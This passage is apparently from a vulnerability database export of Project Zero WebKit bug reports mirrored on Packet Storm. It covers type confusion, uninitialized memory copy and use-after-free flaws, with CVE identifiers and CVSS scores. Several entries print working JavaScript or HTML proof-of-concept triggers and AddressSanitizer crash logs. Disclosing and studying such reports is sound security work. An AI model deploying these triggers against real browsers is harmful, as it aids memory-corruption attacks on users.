(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3f4ab) \n#19 0x10a0e2df1 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dbdf1) \n#20 0x10a0e0b6f in WebCore::AXObjectCache::getOrCreate(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d9b6f) \n#21 0x10a0e650d in WebCore::AXObjectCache::textChanged(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1df50d) \n#22 0x10a820041 in WebCore::Element::attributeChanged(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&, WebCore::Element::AttributeModificationReason) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x919041) \n#23 0x10a826268 in WebCore::Element::didAddAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f268) \n#24 0x10a82607c in WebCore::Element::addAttributeInternal(WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f07c) \n#25 0x10a81f8d7 in WebCore::Element::setAttributeInternal(unsigned int, WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9188d7) \n#26 0x10a81f6c1 in WebCore::Element::setAttribute(WTF::AtomicString const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9186c1) \n#27 0x10b463b93 in 
WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x155cb93) \n#28 0x10b4555d8 in long long WebCore::BindingCaller<WebCore::JSElement>::callOperation<&(WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e5d8) \n#29 0x10b455441 in WebCore::jsElementPrototypeFunctionSetAttribute(JSC::ExecState*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e441) \n \nSUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25bb4) in WebCore::AccessibilityNodeObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const \nShadow bytes around the buggy address: \n0x1c10000120c0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa \n0x1c10000120d0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa \n0x1c10000120e0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00 \n0x1c10000120f0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa \n0x1c1000012100: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd \n=>0x1c1000012110: fa fa fa fa[fd]fd fd fd fd fd fd fd fd fd fd fa \n0x1c1000012120: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa \n0x1c1000012130: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa \n0x1c1000012140: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa \n0x1c1000012150: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa \n0x1c1000012160: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa \nShadow byte legend (one shadow byte represents 8 application bytes): \nAddressable: 00 \nPartially addressable: 01 02 03 04 05 06 07 \nHeap left redzone: fa \nFreed heap 
region: fd \nStack left redzone: f1 \nStack mid redzone: f2 \nStack right redzone: f3 \nStack after return: f5 \nStack use after scope: f8 \nGlobal redzone: f9 \nGlobal init order: f6 \nPoisoned by user: f7 \nContainer overflow: fc \nArray cookie: ac \nIntra object redzone: bb \nASan internal: fe \nLeft alloca redzone: ca \nRight alloca redzone: cb \n==728==ABORTING \n \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. \n \n \n \n \nFound by: ifratric \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/143489/GS20170725051037.txt"}, {"lastseen": "2017-09-12T22:51:37", "description": "", "published": "2017-09-12T00:00:00", "type": "packetstorm", "title": "WebKit JSC BytecodeGenerator::emitGetByVal Incorrect Optimization", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7061"], "modified": "2017-09-12T00:00:00", "id": "PACKETSTORM:144092", "href": "https://packetstormsecurity.com/files/144092/WebKit-JSC-BytecodeGenerator-emitGetByVal-Incorrect-Optimization.html", "sourceData": "` WebKit: JSC: Incorrect optimization in BytecodeGenerator::emitGetByVal \n \nCVE-2017-7061 \n \n \nLet's start with JS code. \n \nlet o = {}; \nfor (let i in {xx: 0}) { \no[i]; <<-------- (a) \n} \n \nWhen the code generator meets (a), it will call BytecodeGenerator::emitGetByVal. \n \nHere's the code of BytecodeGenerator::emitGetByVal. 
\n \nRegisterID* BytecodeGenerator::emitGetByVal(RegisterID* dst, RegisterID* base, RegisterID* property) \n{ \nfor (size_t i = m_forInContextStack.size(); i > 0; i--) { \nForInContext& context = m_forInContextStack[i - 1].get(); \nif (context.local() != property) \ncontinue; \n \nif (!context.isValid()) \nbreak; \n \nif (context.type() == ForInContext::IndexedForInContextType) { \nproperty = static_cast<IndexedForInContext&>(context).index(); \nbreak; \n} \n \nASSERT(context.type() == ForInContext::StructureForInContextType); \nStructureForInContext& structureContext = static_cast<StructureForInContext&>(context); \nUnlinkedValueProfile profile = emitProfiledOpcode(op_get_direct_pname); \ninstructions().append(kill(dst)); \ninstructions().append(base->index()); \ninstructions().append(property->index()); \ninstructions().append(structureContext.index()->index()); \ninstructions().append(structureContext.enumerator()->index()); \ninstructions().append(profile); \nreturn dst; \n} \n \nUnlinkedArrayProfile arrayProfile = newArrayProfile(); \nUnlinkedValueProfile profile = emitProfiledOpcode(op_get_by_val); \ninstructions().append(kill(dst)); \ninstructions().append(base->index()); \ninstructions().append(property->index()); \ninstructions().append(arrayProfile); \ninstructions().append(profile); \nreturn dst; \n} \n \nThe method uses op_get_by_val to handle expressions like \"o[i]\". But, there is a fast path, which uses op_get_direct_pname, for when the index variable is a string. op_get_direct_pname is designed for a string index only. So if other types are used as indexes, it will cause type confusions. In the above JS code, it's very clear that \"i\" will be a string(\"xx\") semantically. Therefore, it will use op_get_direct_pname to handle it. \n \nHere's another example. \n \nlet o = {}; \nfor (let i in {xx: 0}) { \no[i]; <<-------- (a) \ni = 0x123456; <<-------- (b) \no[i]; <<-------- (c) \n} \n \nIn this case, it will use op_get_direct_pname at (a). 
And at (b), since the index variable \"i\" is replaced, the invalidate method of the ForInContext object that makes \"context.isValid()\" return false is called. So, op_get_by_val will be used at (c). \n \nBut the problem is that it can't properly handle the following case which cause a type confusion. \n \nlet o = {}; \nfor (let i in {xx: 0}) { \nfor (let j = 0; j < 2; j++) { \no[i]; // When j == 1, op_get_direct_pname was already emitted, but i is not a string anymore. \ni = 0; \n} \n} \n \nPoC: \nlet o = {}; \nfor (let i in {xx: 0}) { \nfor (let j = 0; j < 2; j++) { \no[i]; \ni = new Uint32Array([0, 1, 0x777777, 0, 0]); \n} \n} \n \n \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. \n \n \n \n \nFound by: lokihardt \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/144092/GS20170912050307.txt"}, {"lastseen": "2017-07-26T22:47:05", "description": "", "published": "2017-07-25T00:00:00", "type": "packetstorm", "title": "WebKit JSC JSArray::appendMemcpy Uninitialized Memory Copy", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7064"], "modified": "2017-07-25T00:00:00", "id": "PACKETSTORM:143479", "href": "https://packetstormsecurity.com/files/143479/WebKit-JSC-JSArray-appendMemcpy-Uninitialized-Memory-Copy.html", "sourceData": "` WebKit: JSC: JSArray::appendMemcpy uninitialized memory copy \n \nCVE-2017-7064 \n \n \nWebKit: JSC: JSArray::appendMemcpy uninitialized memory copy \n \nHere's a snippet of JSArray::appendMemcpy. 
\n \nbool JSArray::appendMemcpy(ExecState* exec, VM& vm, unsigned startIndex, JSC::JSArray* otherArray) \n{ \nauto scope = DECLARE_THROW_SCOPE(vm); \n \nif (!canFastCopy(vm, otherArray)) \nreturn false; \n \nIndexingType type = indexingType(); \nIndexingType copyType = mergeIndexingTypeForCopying(otherArray->indexingType()); \nif (type == ArrayWithUndecided && copyType != NonArray) { \nif (copyType == ArrayWithInt32) \nconvertUndecidedToInt32(vm); \nelse if (copyType == ArrayWithDouble) \nconvertUndecidedToDouble(vm); \nelse if (copyType == ArrayWithContiguous) \nconvertUndecidedToContiguous(vm); \nelse { \nASSERT(copyType == ArrayWithUndecided); \nreturn true; \n} \n} else if (type != copyType) \nreturn false; \n \n... \n \nif (type == ArrayWithDouble) \nmemcpy(butterfly()->contiguousDouble().data() + startIndex, otherArray->butterfly()->contiguousDouble().data(), sizeof(JSValue) * otherLength); \nelse \nmemcpy(butterfly()->contiguous().data() + startIndex, otherArray->butterfly()->contiguous().data(), sizeof(JSValue) * otherLength); \n \nreturn true; \n} \n \nThe method considers the case where |this|'s type is ArrayWithUndecided, but does not consider whether |otherArray|'s type is ArrayWithUndecided that may have uninitialized data. \nSo, when the memcpy function is called, |otherArray|'s uninitialized memory may be copied to |this| which has a type. \n \nPoC: \nfunction optNewArrayAndConcat() { \nlet a = [,,,,,,,,,]; \nreturn Array.prototype.concat.apply(a); \n} \n \nfunction main() { \nArray.prototype.constructor = { \n[Symbol.species]: function () { \nreturn [{}]; \n} \n}; \n \ngc(); \n \nfor (let i = 0; i < 0x10000; i++) { \noptNewArrayAndConcat().fill({}); \n} \n \ngc(); \n \nfor (let i = 0; i < 0x20000; i++) { \nlet res = optNewArrayAndConcat(); \nif (res[0]) \nprint(res.toString()); \n} \n} \n \nmain(); \n \n \n \nThis bug is subject to a 90 day disclosure deadline. 
After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. \n \n \n \n \nFound by: lokihardt \n \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/143479/GS20170725014549.txt"}, {"lastseen": "2017-07-26T22:47:05", "description": "", "published": "2017-07-25T00:00:00", "type": "packetstorm", "title": "WebKit JSC ArgumentsEliminationPhase::transform Incorrect LoadVarargs Handling", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7056"], "modified": "2017-07-25T00:00:00", "id": "PACKETSTORM:143492", "href": "https://packetstormsecurity.com/files/143492/WebKit-JSC-ArgumentsEliminationPhase-transform-Incorrect-LoadVarargs-Handling.html", "sourceData": "` WebKit: JSC: Incorrect LoadVarargs handling in ArgumentsEliminationPhase::transform \n \nCVE-2017-7056 \n \n \nHere is a snippet of ArgumentsEliminationPhase::transform \ncase LoadVarargs: \n... \nif (candidate->op() == PhantomNewArrayWithSpread || candidate->op() == PhantomSpread) { \n... \nif (argumentCountIncludingThis <= varargsData->limit) { \nstoreArgumentCountIncludingThis(argumentCountIncludingThis); \n// store arguments \n... \n} \n \nnode->remove(); \nnode->origin.exitOK = canExit; \nbreak; \n} \n \nWhether or not the \"argumentCountIncludingThis <= varargsData->limit\" condition is satisfied, it removes the |node| variable and exits the switch statement. So in this case the condition is not satisfied, the arguments object created by the following code(CreateDirectArguments in the PoC) may have uninitialized values and length. 
\n \nPoC: \nconst kArgsLength = 0x101; \n \nlet buggy = null; \nfunction inlineFunc() { \nif (arguments.length != kArgsLength) { \nbuggy = arguments; \n} \n} \n \nclass ClassForInine extends inlineFunc { \n} \n \nfunction sleep(ms) { \nlet start = new Date(); \nwhile (new Date() - start < ms); \n} \n \nfunction main() { \nlet args = new Array(kArgsLength); \nargs.fill(333 + 1); \nargs = args.join(', '); \n \nlet opt = new Function(`(() => { \nnew ClassForInine(${args}); \n})();`); \n \nfor (let i = 0; i < 0x100000; i++) { \nopt(); \n \nif (i === 0x3000) \nsleep(1000); \n \nif (buggy) { \nprint('buggy.length: ' + buggy.length); \nbreak; \n} \n} \n \nfor (let i = 0, n = buggy.length; i < n; i++) { \nprint(buggy[i]); \n} \n} \n \nmain(); \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. \n \n \n \n \nFound by: lokihardt \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/143492/GS20170725051507.txt"}, {"lastseen": "2017-07-26T22:47:05", "description": "", "published": "2017-07-25T00:00:00", "type": "packetstorm", "title": "WebKit WebCore::Node::nextSibling Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7039"], "modified": "2017-07-25T00:00:00", "id": "PACKETSTORM:143483", "href": "https://packetstormsecurity.com/files/143483/WebKit-WebCore-Node-nextSibling-Use-After-Free.html", "sourceData": "`WebKit: use-after-free in WebCore::Node::nextSibling \n \nCVE-2017-7039 \n \n \nThere is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. 
\n \nPoC: \n \n================================================================= \n \n<script> \nfunction freememory() { \nvar a; \nfor(var i=0;i<100;i++) { \na = new Uint8Array(1024*1024); \n} \n} \nfunction go() { \nmeter.textContent = \"foo\"; \nfreememory(); \n} \nfunction eventhandler() { \ntemplate.appendChild(table); \n} \n</script> \n<body onload=go()> \n<meter id=\"meter\"> \n<shadow> \n<template id=\"template\"> \n</template> \n<style onload=\"eventhandler()\"></style> \n<table id=\"table\"> \n<iframe></iframe> \n<svg> \n \n================================================================= \n \nASan log: \n \n================================================================= \n==29516==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c0000b7070 at pc 0x0001111c843b bp 0x7fff5369a300 sp 0x7fff5369a2f8 \nREAD of size 8 at 0x60c0000b7070 thread T0 \n==29516==WARNING: invalid path to external symbolizer! \n==29516==WARNING: Failed to use and restart external symbolizer! \n#0 0x1111c843a in WebCore::Node::nextSibling() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1343a) \n#1 0x1115649f3 in WebCore::removeDetachedChildrenInContainer(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3af9f3) \n#2 0x111550892 in WebCore::ContainerNode::~ContainerNode() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x39b892) \n#3 0x11195296d in WebCore::HTMLUnknownElement::~HTMLUnknownElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x79d96d) \n#4 0x11e792118 in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, 
(JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'(unsigned long)::operator()(unsigned long) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12d1118) \n#5 0x11e79092f in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cf92f) \n#6 0x11e78f3d2 in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'()::operator()() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12ce3d2) \n#7 0x11e78ebdd in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cdbdd) \n#8 0x11e78e83c in JSC::JSDestructibleObjectSubspace::finishSweep(JSC::MarkedBlock::Handle&, JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cd83c) \n#9 0x11ea4de0d in JSC::MarkedBlock::Handle::sweep(JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x158ce0d) \n#10 0x11ea48f74 in JSC::MarkedAllocator::tryAllocateIn(JSC::MarkedBlock::Handle*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1587f74) \n#11 0x11ea488c9 in JSC::MarkedAllocator::tryAllocateWithoutCollecting() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x15878c9) \n#12 0x11ea498da in JSC::MarkedAllocator::allocateSlowCaseImpl(JSC::GCDeferralContext*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x15888da) \n#13 0x1124f0ac9 in void* JSC::allocateCell<WebCore::JSHTMLDocument>(JSC::Heap&, unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133bac9) \n#14 0x1124f0724 in WebCore::JSHTMLDocument::create(JSC::Structure*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b724) \n#15 0x1124f066b in std::__1::enable_if<std::is_same<WebCore::HTMLDocument, WebCore::HTMLDocument>::value, WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::HTMLDocument>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b66b) \n#16 0x1124f0439 in std::__1::enable_if<!(std::is_same<WebCore::HTMLDocument, WebCore::Document>::value), WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::Document>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b439) \n#17 0x1124efb1d in WebCore::createNewDocumentWrapper(JSC::ExecState&, WebCore::JSDOMGlobalObject&, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133ab1d) \n#18 0x1124efce8 in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133ace8) \n#19 0x112ac88fe in WebCore::createWrapper(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Node>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x19138fe) \n#20 0x111f50f6b in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd9bf6b) \n#21 0x1126e1040 in WebCore::JSDOMWindowBase::updateDocument() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x152c040) \n#22 0x113a707c3 in WebCore::ScriptController::initScript(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28bb7c3) \n#23 0x10c925476 in WebCore::ScriptController::windowShell(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3af476) \n#24 0x10c922b08 in 
WebCore::ScriptController::globalObject(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3acb08) \n#25 0x10cc39044 in WebKit::WebFrame::jsContextForWorld(WebKit::InjectedBundleScriptWorld*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x6c3044) \n#26 0x7fffe41e0ab1 in Safari::WebFeedFinderController::WebFeedFinderController(Safari::WK::BundleFrame const&) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0x55cab1) \n#27 0x7fffe3d3cb57 in Safari::BrowserBundlePageController::determineWebFeedInformation(Safari::WK::BundleFrame const&) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0xb8b57) \n#28 0x7fffe3d4a12d in Safari::BrowserBundlePageLoaderClient::didFinishLoadForFrame(Safari::WK::BundlePage const&, Safari::WK::BundleFrame const&, Safari::WK::Type&) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0xc612d) \n#29 0x7fffe3e235ce in Safari::WK::didFinishLoadForFrame(OpaqueWKBundlePage const*, OpaqueWKBundleFrame const*, void const**, void const*) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0x19f5ce) \n#30 0x10c72ccb5 in WebKit::InjectedBundlePageLoaderClient::didFinishLoadForFrame(WebKit::WebPage*, WebKit::WebFrame*, WTF::RefPtr<API::Object>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x1b6cb5) \n#31 0x10cc439ae in WebKit::WebFrameLoaderClient::dispatchDidFinishLoad() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x6cd9ae) \n#32 0x111cd6602 in WebCore::FrameLoader::checkLoadCompleteForThisFrame() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb21602) \n#33 0x111cca297 in WebCore::FrameLoader::checkLoadComplete() 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb15297) \n#34 0x1119a03d1 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb3d1) \n#35 0x11142f997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997) \n#36 0x1114292aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa) \n#37 0x113db0c41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41) \n#38 0x10cfff2eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb) \n#39 0x10d002689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689) \n#40 0x10d001ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9) \n#41 0x10c8a2683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683) \n#42 0x10c64c3b5 in 
IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5) \n#43 0x10c655888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888) \n#44 0x11f0c4312 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03312) \n#45 0x11f0c4d41 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03d41) \n#46 0x7fffd2f753c0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa73c0) \n#47 0x7fffd2f562cc in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x882cc) \n#48 0x7fffd2f557c5 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x877c5) \n#49 0x7fffd2f551c3 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x871c3) \n#50 0x7fffd24b6ebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb) \n#51 0x7fffd24b6cf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0) \n#52 0x7fffd24b6b25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25) \n#53 0x7fffd0a51e23 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46e23) \n#54 
